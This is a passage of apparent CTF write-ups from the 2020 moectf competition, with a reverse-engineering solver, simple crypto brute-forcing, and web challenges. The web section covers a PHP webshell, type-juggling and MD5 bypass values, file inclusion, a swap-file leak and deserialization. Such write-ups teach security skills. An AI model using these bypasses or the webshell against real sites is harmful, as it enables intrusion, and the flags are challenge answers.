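Alongside the inverse script, here is an added Python example (not the author's script and not code from the binary) that re-implements the check from the C++ reproduction above and then inverts it. It handles two things the reproduction glosses over: <code>fun2</code>'s <code>abs()</code> is not one-to-one, so the solver enumerates both preimages and keeps only candidates that re-encrypt to <code>byte_4032AC</code>; and the signedness of the bytes handed to <code>abs()</code> matters. With the page's own constants, the C++ as written (unsigned bytes) admits no solution at all, because byte 4 would need <code>|a - 148| == 192</code>, which no byte satisfies; treating the bytes as signed (int8) does admit one. The binary's convention is not visible on the page, so signed arithmetic in <code>fun2</code> is an assumption here, chosen because it is the reading under which the target bytes are reachable. All constants (<code>rel</code>, the XOR keys, <code>0x16</code>, the nibble swap and the <code>+index</code> in <code>fun0</code>) are copied from the C++ on the page.

```python
# Added example, not the author's script: the Flower check re-implemented from
# the C++ reproduction above, then inverted. Constants are copied from the page.
# Assumption (not shown on the page): fun2 subtracts signed (int8) bytes before
# abs(); with unsigned bytes the page's REL is unreachable (see unabs_unsigned).

REL = [62, 254, 153, 118, 139, 220, 13, 24, 50, 120, 111, 191, 67, 116, 51, 115]
XOR_KEYS = [0x4D, 0x4C, 0x47, 0x50, 0x4B, 0x46, 0x43, 0x4A,
            0x45, 0x4E, 0x49, 0x48, 0x44, 0x42, 0x41]   # 15 keys, byte 15 untouched


def signed(b):
    """Reinterpret an unsigned byte as int8 (the assumed convention inside fun2)."""
    return b - 256 if b > 127 else b


def swap_nibbles(b):
    return ((b << 4) | (b >> 4)) & 0xFF


def func1(data):
    """loc_401310: XOR each byte with 0x16, then swap its nibbles."""
    return [swap_nibbles(b ^ 0x16) for b in data]


def inv_func1(data):
    """Undo func1: the nibble swap is an involution, so swap first, then XOR."""
    return [swap_nibbles(b) ^ 0x16 for b in data]


def func2(a):
    """sub_4011B0 + sub_4012D0: the fun0/fun1/fun2 chain, then the per-byte XORs."""
    a = list(a)
    a[0] = (a[0] + 1) & 0xFF                    # fun0(0,1): adds the index, as on the page
    a[1] ^= a[2]                                # fun1(1,2)
    a[2] = abs(signed(a[2]) - signed(a[3]))     # fun2(2,3), signed bytes (assumed)
    a[3] ^= a[4]                                # fun1(3,4)
    a[4] = abs(signed(a[4]) - signed(a[5]))     # fun2(4,5)
    a[5] = (a[5] + 6) & 0xFF                    # fun0(5,6)
    a[6] = (a[6] + 7) & 0xFF                    # fun0(6,7)
    for i, k in enumerate(XOR_KEYS):            # sub_4012D0
        a[i] ^= k
    return a


def encrypt(flag):
    """The 16 bytes the binary compares with byte_4032AC (REL)."""
    assert len(flag) == 16
    return func2(func1(list(flag.encode("latin-1"))))


def unabs(d, b):
    """All int8 values a with |a - b| == d, as unsigned bytes (0, 1 or 2 of them)."""
    return [c & 0xFF for c in (b + d, b - d) if -128 <= c <= 127]


def unabs_unsigned(d, b):
    """Same question for unsigned bytes, i.e. the C++ on the page as written."""
    return [c for c in (b + d, b - d) if 0 <= c <= 255]


def solve(rel=REL):
    """Undo the XORs, then the chain (branching on abs), then func1; keep only
    candidates that really re-encrypt to rel."""
    b = list(rel)
    for i, k in enumerate(XOR_KEYS):
        b[i] ^= k
    a = [None] * 16
    a[7:] = b[7:]                               # bytes 7..15 pass the chain unchanged
    a[6] = (b[6] - 7) & 0xFF
    a[5] = (b[5] - 6) & 0xFF
    a[0] = (b[0] - 1) & 0xFF
    found = []
    for a4 in unabs(b[4], signed(a[5])):        # fun2(4,5) used the original a[5]
        a[4] = a4
        a[3] = b[3] ^ a[4]                      # fun1(3,4) used the original a[4]
        for a2 in unabs(b[2], signed(a[3])):
            a[2] = a2
            a[1] = b[1] ^ a[2]
            flag = bytes(inv_func1(a)).decode("latin-1")
            if encrypt(flag) == list(rel):      # discard abs branches that don't round-trip
                found.append(flag)
    return found


if __name__ == "__main__":
    for candidate in solve():
        print(candidate)
```

The re-encryption check at the end is what makes the <code>abs()</code> branching safe: every candidate the enumeration produces is pushed back through <code>encrypt</code>, so a wrong branch (or a wrong signedness assumption) yields an empty result rather than a plausible-looking wrong flag.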
class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">#<span class="meta-keyword">include</span><span class="meta-string"><bits/stdc++.h></span></span></span><br><span class="line"><span class="keyword">using</span> <span class="keyword">namespace</span> <span class="built_in">std</span>;</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ori[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="function"><span class="keyword">void</span> <span class="title">ini</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> 
input[i]=ori[i];</span><br><span class="line"><span class="keyword">return</span>;</span><br><span class="line">}</span><br><span class="line"><span class="function"><span class="keyword">int</span> <span class="title">main</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> ori[<span class="number">20</span>]={<span class="number">62</span>,<span class="number">254</span>,<span class="number">153</span>,<span class="number">118</span>,<span class="number">139</span>,<span class="number">220</span>,<span class="number">13</span>,<span class="number">24</span>,<span class="number">50</span>,<span class="number">120</span>,<span class="number">111</span>,<span class="number">191</span>,<span class="number">67</span>,<span class="number">116</span>,<span class="number">51</span>,<span class="number">115</span>};</span><br><span class="line"><span class="keyword">unsigned</span> <span class="keyword">char</span> input[<span class="number">20</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> input[i]=ori[i];</span><br><span class="line"> input[<span class="number">0</span>]^=<span class="number">0x4D</span>;</span><br><span class="line">input[<span class="number">1</span>]^=<span class="number">0x4C</span>;</span><br><span class="line">input[<span class="number">2</span>]^=<span class="number">0x47</span>;</span><br><span class="line">input[<span class="number">3</span>]^=<span class="number">0x50</span>;</span><br><span class="line">input[<span class="number">4</span>]^=<span class="number">0x4B</span>;</span><br><span class="line">input[<span class="number">5</span>]^=<span class="number">0x46</span>;</span><br><span class="line">input[<span 
class="number">6</span>]^=<span class="number">0x43</span>;</span><br><span class="line">input[<span class="number">7</span>]^=<span class="number">0x4A</span>;</span><br><span class="line">input[<span class="number">8</span>]^=<span class="number">0x45</span>;</span><br><span class="line">input[<span class="number">9</span>]^=<span class="number">0x4E</span>;</span><br><span class="line">input[<span class="number">10</span>]^=<span class="number">0x49</span>;</span><br><span class="line">input[<span class="number">11</span>]^=<span class="number">0x48</span>;</span><br><span class="line">input[<span class="number">12</span>]^=<span class="number">0x44</span>;</span><br><span class="line">input[<span class="number">13</span>]^=<span class="number">0x42</span>;</span><br><span class="line">input[<span class="number">14</span>]^=<span class="number">0x41</span>;</span><br><span class="line">input[<span class="number">6</span>]-=<span class="number">7</span>;</span><br><span class="line">input[<span class="number">5</span>]-=<span class="number">6</span>;</span><br><span class="line">input[<span class="number">0</span>] -= <span class="number">1</span>;</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> i=<span class="number">0</span>;i<<span class="number">16</span>;i++)</span><br><span class="line"> ori[i]=input[i];</span><br><span class="line"></span><br><span class="line">input[<span class="number">4</span>] += input[<span class="number">5</span>];</span><br><span class="line">input[<span class="number">3</span>] ^=input[<span class="number">4</span>];</span><br><span class="line">input[<span class="number">2</span>] = input[<span class="number">3</span>]-input[<span class="number">2</span>];</span><br><span class="line">input[<span class="number">1</span>] ^=input[<span class="number">2</span>];</span><br><span class="line"><span class="keyword">for</span>(<span class="keyword">int</span> k=<span 
class="number">0</span>;k<<span class="number">16</span>;k++)</span><br><span class="line">{</span><br><span class="line">input[k] = (<span class="number">16</span> * input[k] | (input[k] >> <span class="number">4</span>));</span><br><span class="line">input[k] ^= <span class="number">0x16</span>;</span><br><span class="line"><span class="built_in">cout</span><<input[k];</span><br><span class="line">}</span><br><span class="line"><span class="built_in">cout</span><<<span class="string">"\n\n"</span>;</span><br><span class="line"><span class="keyword">return</span> <span class="number">0</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>Oh, I forgot to mention: <strong>if <code>IDA</code> shows <code>unsigned char</code>, your program must also use <code>unsigned char</code>, especially where the intermediate processing involves bit operations.</strong> A plain <code>char</code> may be signed, and a signed value sign-extends when it is promoted to <code>int</code>, so the shift-and-OR in the script above would give a different result.</p><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>Ones I didn't solve</h2><h3 id="GoOooO0Oo"><a href="#GoOooO0Oo" class="headerlink" title="GoOooO0Oo"></a>GoOooO0Oo</h3><h3 id="EasyAlgorithm"><a href="#EasyAlgorithm" class="headerlink" title="EasyAlgorithm"></a>EasyAlgorithm</h3><h3 id="Easy-C"><a href="#Easy-C" class="headerlink" title="Easy C++"></a>Easy C++</h3>]]></content>
<categories>
<category> CTF Competition Write-ups </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> RE </tag>
</tags>
</entry>
<entry>
<title>2020moectf Crypto</title>
<link href="2020/10/13/2020moectf-Crypto/"/>
<url>2020/10/13/2020moectf-Crypto/</url>
<content type="html"><![CDATA[<p>My cryptography is honestly terrible... sigh~ I can only do the easy problems (my math is too weak)</p><p><img src="/images/2020moectf-Crypto/image-20201012091130231.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012091130231.png" srcset="" alt="image-20201012091130231"></p><a id="more"></a><h2 id="我会做的"><a href="#我会做的" class="headerlink" title="我会做的"></a>Ones I could solve</h2><h3 id="crypto入门指北"><a href="#crypto入门指北" class="headerlink" title="crypto入门指北"></a>crypto入门指北 (crypto starter guide)</h3><p>Thanks to the great shallow for the study materials~~</p><h3 id="Stream"><a href="#Stream" class="headerlink" title="Stream"></a>Stream</h3><p>This challenge is a bit nasty... first, the encryption script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">flag = <span class="string">"XXXXXXXXXXXXXXXXXXXXXXXXXXXX"</span></span><br><span class="line">xor = ?</span><br><span class="line">print(<span class="built_in">len</span>(xor))</span><br><span class="line">print(base64.b64encode((<span class="string">""</span>.join([<span class="built_in">chr</span>(<span class="built_in">ord</span>(i)^<span class="built_in">ord</span>(xor)) <span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">list</span>(flag)])).encode(<span class="string">"ASCII"</span>)))</span><br><span class="line"><span class="comment">#1</span></span><br><span class="line"><span class="comment">#b'Og9hNAFrCjU9aQ4+C2psLzxpYRE6azw+FmphPgk2EjQBDyw+DWsKIQIPHiwAaBYoOx8wNBU2aGU='</span></span><br></pre></td></tr></table></figure><p>One look shows that xor is a single character, so brute-force it!!!</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line">f = <span class="built_in">open</span>(<span class="string">"out2.txt"</span>,<span class="string">"w"</span>,encoding=<span class="string">"utf-8"</span>)</span><br><span class="line">flag = <span class="string">b'Og9hNAFrCjU9aQ4+C2psLzxpYRE6azw+FmphPgk2EjQBDyw+DWsKIQIPHiwAaBYoOx8wNBU2aGU='</span></span><br><span class="line">flag = base64.b64decode(flag)</span><br><span class="line">f.write(<span class="string">"\n————————————————开始爆破————————————————\n\n\n"</span>)</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">0</span>,<span class="number">128</span>):</span><br><span class="line">    f.write(<span class="built_in">str</span>(i))</span><br><span class="line">    ans=<span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> flag:</span><br><span class="line">        ans = ans + (<span class="built_in">chr</span>(i^j))</span><br><span class="line">    f.write(ans) </span><br><span class="line">    f.write(<span class="string">"\n————————————————————分割线——————————————————————\n\n"</span>)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>But why do I think this challenge is a bit nasty? Because what comes out is not the flag but the base64 of the flag... I really didn't think of that at first.</p><p><img src="/images/2020moectf-Crypto/image-20201012093208401.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012093208401.png" srcset="" alt="image-20201012093208401"></p><blockquote><p>moectf{U_Kn0w_How_7o_Break_Stream_Ciphe2}</p></blockquote><h3 id="easycrypto"><a 
href="#easycrypto" class="headerlink" title="easycrypto"></a>easycrypto</h3><p>Just brute-force it:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> FLAG <span class="keyword">import</span> flag</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">enc</span>(<span class="params">plain</span>):</span></span><br><span class="line">    cipher = []</span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> plain:</span><br><span class="line">        m = <span class="built_in">ord</span>(i)</span><br><span class="line">        cipher.append(<span class="number">5</span> * m ** <span class="number">2</span> + <span class="number">6</span> * m - <span class="number">8</span>)</span><br><span class="line">    <span class="keyword">return</span> cipher</span><br><span class="line"></span><br><span class="line">print(enc(flag))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="comment">#[60051, 62263, 51603, 49591, 67968, 52624, 76375, 38359, 51603, 58960, 
49591, 62263, 60051, 51603, 45687, 67968, 62263, 45687, 22839, 65656, 73923, 63384, 67968, 62263, 78867]</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">cnt=<span class="number">1</span></span><br><span class="line">flag_en=[<span class="number">60051</span>, <span class="number">62263</span>, <span class="number">51603</span>, <span class="number">49591</span>, <span class="number">67968</span>, <span class="number">52624</span>, <span class="number">76375</span>, <span class="number">38359</span>, <span class="number">51603</span>, <span class="number">58960</span>, <span class="number">49591</span>, <span class="number">62263</span>, <span class="number">60051</span>, <span class="number">51603</span>, <span class="number">45687</span>, <span class="number">67968</span>, <span class="number">62263</span>, <span class="number">45687</span>, <span class="number">22839</span>, <span class="number">65656</span>, <span class="number">73923</span>, <span class="number">63384</span>, <span class="number">67968</span>, <span class="number">62263</span>, <span class="number">78867</span>]</span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> flag_en:</span><br><span class="line">    cnt+=<span class="number">1</span></span><br><span class="line">    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">48</span>,<span class="number">130</span>):</span><br><span class="line">        <span class="keyword">if</span>(<span class="number">5</span>*j**<span class="number">2</span>+<span class="number">6</span>*j-<span class="number">8</span>==i):</span><br><span class="line">            print(<span class="built_in">chr</span>(j),end=<span class="string">''</span>)</span><br><span class="line"><span class="comment">#moectf{Welcome_to_Crypto}</span></span><br><span class="line"></span><br><span 
class="line"></span><br></pre></td></tr></table></figure><h3 id="rsa-begin"><a href="#rsa-begin" class="headerlink" title="rsa_begin"></a>rsa_begin</h3><p>Since this is the first problem, a tool handles it outright; here is a <a href="https://www.jianshu.com/p/c945b0f0de0a">tool tutorial</a>, just run it through in one go.</p><p><img src="/images/2020moectf-Crypto/image-20201012095243683.png" class="lazyload" data-srcset="/images/2020moectf-Crypto/image-20201012095243683.png" srcset="" alt="image-20201012095243683"></p><blockquote><p>moectf{Ull_f1nd_RSA_1s_1nte2est1ng}</p></blockquote><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>Ones I didn't solve</h2><p>Quietly waiting for the official write-up</p>]]></content>
<categories>
<category> CTF Competition Write-ups </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> Crypto </tag>
</tags>
</entry>
<entry>
<title>2020moectf Web</title>
<link href="2020/10/13/2020moectf-Web/"/>
<url>2020/10/13/2020moectf-Web/</url>
<content type="html"><![CDATA[<p>As a binary person... I forced my way through all the web challenges; it was rough...</p><a id="more"></a><h2 id="GET"><a href="#GET" class="headerlink" title="GET"></a>GET</h2><p><img src="/images/2020moectf-Web/image-20201012095628380.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095628380.png" srcset="" alt="image-20201012095628380"></p><h2 id="POST"><a href="#POST" class="headerlink" title="POST"></a>POST</h2><p><img src="/images/2020moectf-Web/image-20201012095732293.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095732293.png" srcset="" alt="image-20201012095732293"></p><h2 id="小饼干"><a href="#小饼干" class="headerlink" title="小饼干"></a>小饼干 (Little Biscuit)</h2><p>Little biscuit? Cookie!</p><p><img src="/images/2020moectf-Web/image-20201012095851718.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012095851718.png" srcset="" alt="image-20201012095851718"></p><p>URL-decode it:</p><blockquote><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">moectf{y0u_c4n't_e4t_thi3_c00k1e}</span><br></pre></td></tr></table></figure></blockquote><h2 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h2><img src="/images/2020moectf-Web/image-20201012100120336.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100120336.png" srcset="" alt="image-20201012100120336" style="zoom:67%;"><p>Open the page, Ctrl+U to view the source, Ctrl+F to search</p><p><img src="/images/2020moectf-Web/image-20201012100209487.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100209487.png" srcset="" alt="image-20201012100209487"></p><p><img src="/images/2020moectf-Web/image-20201012100245521.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012100245521.png" srcset="" alt="image-20201012100245521"></p><h2 id="一句话"><a href="#一句话" class="headerlink" title="一句话"></a>一句话 (One-liner)</h2><p>The one-line webshell is still a fairly common test point; nowadays you just use AntSword or Cknife in one go, I recommend <a 
href="https://blog.csdn.net/weixin_41924764/article/details/108099952">AntSword</a>...</p><p><img src="/images/2020moectf-Web/image-20201012213313189.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012213313189.png" srcset="" alt="image-20201012213313189"></p><p><img src="/images/2020moectf-Web/image-20201012213344797.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012213344797.png" srcset="" alt="image-20201012213344797"></p><blockquote><p>moectf{0hhhh!!!y0u_know_h0w_to_u3e_eva1}</p></blockquote><h2 id="EzMath"><a href="#EzMath" class="headerlink" title="EzMath"></a>EzMath</h2><p>It refreshes so fast that you can't possibly do the arithmetic by hand, so a script is needed here. This challenge is very similar to a bugku problem: 秋名山老司机 (Qiuming Mountain Old Driver). I dug up my old notes and ended up with this script:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> requests</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line">url = <span class="string">'http://39.98.86.109:10001/index.php'</span></span><br><span class="line">s = requests.Session()</span><br><span class="line">source = s.get(url)</span><br><span class="line">expression = re.search(<span class="string">r'(\d+[+\-*])+(\d+)'</span>, source.text).group()</span><br><span class="line">result = <span class="built_in">eval</span>(expression)</span><br><span class="line">post = {<span class="string">'a'</span>: result}</span><br><span class="line">print(s.post(url, data = post).text)</span><br></pre></td></tr></table></figure><p>One caveat on the script: <code>eval</code> runs on text taken from the server's response, and only the regex, which admits nothing but digits and <code>+</code>, <code>-</code>, <code>*</code>, keeps that from becoming arbitrary code execution on your own machine.</p><p>Damn!!! The environment was gone when I tried to reproduce it. Here is the <a href="http://123.206.87.240:8002/qiumingshan/">秋名山老司机</a> challenge; you can try adapting my script above~</p><h2 id="三心二意"><a href="#三心二意" class="headerlink" 
title="三心二意"></a>三心二意 (Of Two Minds)</h2><p>Here is the source first:</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line"><span class="variable">$a</span> = <span class="variable">$_GET</span>[<span class="string">'a'</span>];</span><br><span class="line"><span class="variable">$b</span> = <span class="variable">$_POST</span>[<span class="string">'b'</span>];</span><br><span class="line"><span class="variable">$c</span> = <span class="variable">$_REQUEST</span>[<span class="string">'c'</span>];</span><br><span class="line"><span class="variable">$d</span> = <span class="variable">$_COOKIE</span>[<span class="string">'d'</span>];</span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> 
(!<span class="keyword">isset</span>(<span class="variable">$a</span>, <span class="variable">$b</span>, <span class="variable">$c</span>, <span class="variable">$d</span>)) {</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line">} <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">if</span> (is_numeric(<span class="variable">$a</span>) <span class="keyword">and</span> <span class="variable">$a</span> == <span class="literal">false</span>) { <span class="comment">//a=0</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'A is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (!is_numeric(<span class="variable">$b</span>) <span class="keyword">and</span> <span class="variable">$b</span> == <span class="number">0x125e591</span>) { <span class="comment">//b=19260817a</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'B is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (<span class="variable">$c</span> != <span class="number">240610708</span> <span class="keyword">and</span> md5(<span class="variable">$c</span>) == md5(<span class="number">240610708</span>)) { <span class="comment">//c=s214587387a</span></span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'C is OK!'</span>;</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">'<br/>'</span>;</span><br><span class="line"> <span class="keyword">if</span> (strlen(<span class="variable">$d</span>) < <span class="number">7</span> <span class="keyword">and</span> <span class="variable">$d</span> != <span class="number">0</span> <span 
class="keyword">and</span> <span class="variable">$d</span> ** <span class="number">2</span> == <span class="number">0</span>) { <span class="comment">//d[]=</span></span><br><span class="line"> <span class="keyword">include</span>(<span class="string">'/flag'</span>);</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"D is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"C is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"Too young too simple.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line"> } <span class="keyword">else</span> {</span><br><span class="line"> <span class="keyword">echo</span> <span class="string">"A is not wanted.<br/>"</span>;</span><br><span class="line"> highlight_file(<span class="keyword">__FILE__</span>);</span><br><span class="line"> }</span><br><span class="line">}</span><br></pre></td></tr></table></figure><p>One look tells you this challenge tests a few small PHP tricks (every check leans on loose <code>==</code> comparison and type juggling): first give all four variables a, b, c and d a value, then tune them one at a time.</p><p>a needs no explanation...</p><p>b needs no explanation...</p><p>c is an <a href="https://www.cnblogs.com/weiyinfu/p/6821812.html">md5 bypass</a>; see that article.</p><p>d needs no explanation...</p><p>That's all~ love does fade, doesn't it</p><h2 id="俄罗斯头套"><a href="#俄罗斯头套" class="headerlink" title="俄罗斯头套"></a>俄罗斯头套 (Russian Balaclava)</h2><p>I had never done anything like this one, so I searched Baidu on the spot and found that the test point is HTTP response headers. With that, there is nothing much to say about it: capture the request, modify the headers... done.</p><p>Here are two screenshots after the modification:<img src="/images/2020moectf-Web/image-20201012225925372.png" 
class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012225925372.png" srcset="" alt="image-20201012225925372"></p><p><img src="/images/2020moectf-Web/image-20201012230029417.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230029417.png" srcset="" alt="image-20201012230029417"></p><blockquote><p>moectf{r3que5t_he4der_1s_ea5y!!}</p></blockquote><h2 id="include"><a href="#include" class="headerlink" title="include"></a>include</h2><p>Blind guess: a file inclusion vulnerability... click on "do not click"??? I'll click anyway, then view the source:</p><p><img src="/images/2020moectf-Web/image-20201012230214247.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230214247.png" srcset="" alt="image-20201012230214247"></p><p>Sure enough, just as I guessed.</p><p>Try it first:<img src="/images/2020moectf-Web/image-20201012230339016.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230339016.png" srcset="" alt="image-20201012230339016"></p><p>OK, I was thinking too simply. The flag should be in a comment, so we just base64 the whole file:<img src="/images/2020moectf-Web/image-20201012230449160.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230449160.png" srcset="" alt="image-20201012230449160"></p><blockquote><p>&lt;?php echo "Can you get the flag?"; //moectf{php_is_the_best_language}</p></blockquote><h2 id="Moe-unserialize"><a href="#Moe-unserialize" class="headerlink" title="Moe unserialize"></a>Moe unserialize</h2><p>Guessing the test point from the title: deserialization<br><img src="/images/2020moectf-Web/image-20201012230625656.png" class="lazyload" data-srcset="/images/2020moectf-Web/image-20201012230625656.png" srcset="" alt="image-20201012230625656"></p><p>The first test point here is vim's backup file; we enter</p><blockquote><p> <a href="http://web.moectf.online/unserialize/.index.php.swp">http://web.moectf.online/unserialize/.index.php.swp</a></p></blockquote><p>Download the file, then use vim in WSL to recover the swp backup file</p><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span 
class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta"><?php</span></span><br><span class="line">error_reporting(<span class="number">0</span>);</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">Moe</span> </span>{</span><br><span class="line"> <span class="keyword">public</span> <span class="variable">$a</span>;</span><br><span class="line"> <span class="keyword">protected</span> <span class="variable">$b</span>;</span><br><span class="line"> <span class="keyword">private</span> <span class="variable">$c</span>;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"> <span class="function"><span class="keyword">function</span> <span class="title">__destruct</span>(<span class="params"></span>) </span>{</span><br><span class="line"> <span class="keyword">if</span> (<span class="keyword">$this</span>->a === <span class="string">'1'</span> && <span class="keyword">$this</span>->b === <span class="string">'2'</span> && <span class="keyword">$this</span>->c === <span class="string">'3'</span>) {</span><br><span class="line"> <span class="keyword">include</span> <span class="string">'flag.php'</span>;</span><br><span class="line"> <span class="keyword">die</span>(<span class="variable">$flag</span>);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line">}</span><br><span class="line"><span class="variable">$moe</span> = <span class="variable">$_GET</span>[<span 
